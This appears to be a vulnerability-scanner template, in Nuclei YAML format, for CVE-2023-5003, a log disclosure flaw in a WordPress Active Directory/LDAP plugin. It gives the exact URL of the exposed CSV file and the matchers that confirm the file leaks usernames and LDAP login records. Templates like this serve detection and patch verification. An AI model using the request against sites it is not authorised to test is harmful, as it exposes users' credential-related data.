46 lines
1.6 KiB
YAML
46 lines
1.6 KiB
YAML
id: CVE-2023-5003
|
|
|
|
info:
|
|
name: Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure
|
|
author: Kazgangap
|
|
severity: high
|
|
description: |
|
|
The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.
|
|
remediation: Fixed in 4.1.10
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-5003
|
|
- https://wpscan.com/vulnerability/91f4e500-71f3-4ef6-9cc7-24a7c12a5748/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-5003
|
|
epss-score: 0.00419
|
|
epss-percentile: 0.7409
|
|
cpe: cpe:2.3:a:miniorange:active_directory_integration_\/_ldap_integration:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: miniorange
|
|
product: active_directory_integration_\/_ldap_integration
|
|
framework: wordpress
|
|
tags: wpscan,exposure,csv,ldap,wordpress,wp-plugin,cve,cve2023,miniorange
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-content/ldap-authentication-report.csv"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "ID"
|
|
- "USERNAME"
|
|
- "TIME"
|
|
- "LDAP STATUS"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502204fcec3fd699084b441ca3a706cf44ff0521716935ee18cebb1efb184eb2b15a20221009553830ff5f7b4dd5de086b1a2afae4f141b17c89d13d153b6dd97702002ee2d:922c64590222798bb761d5b6d8e72950 |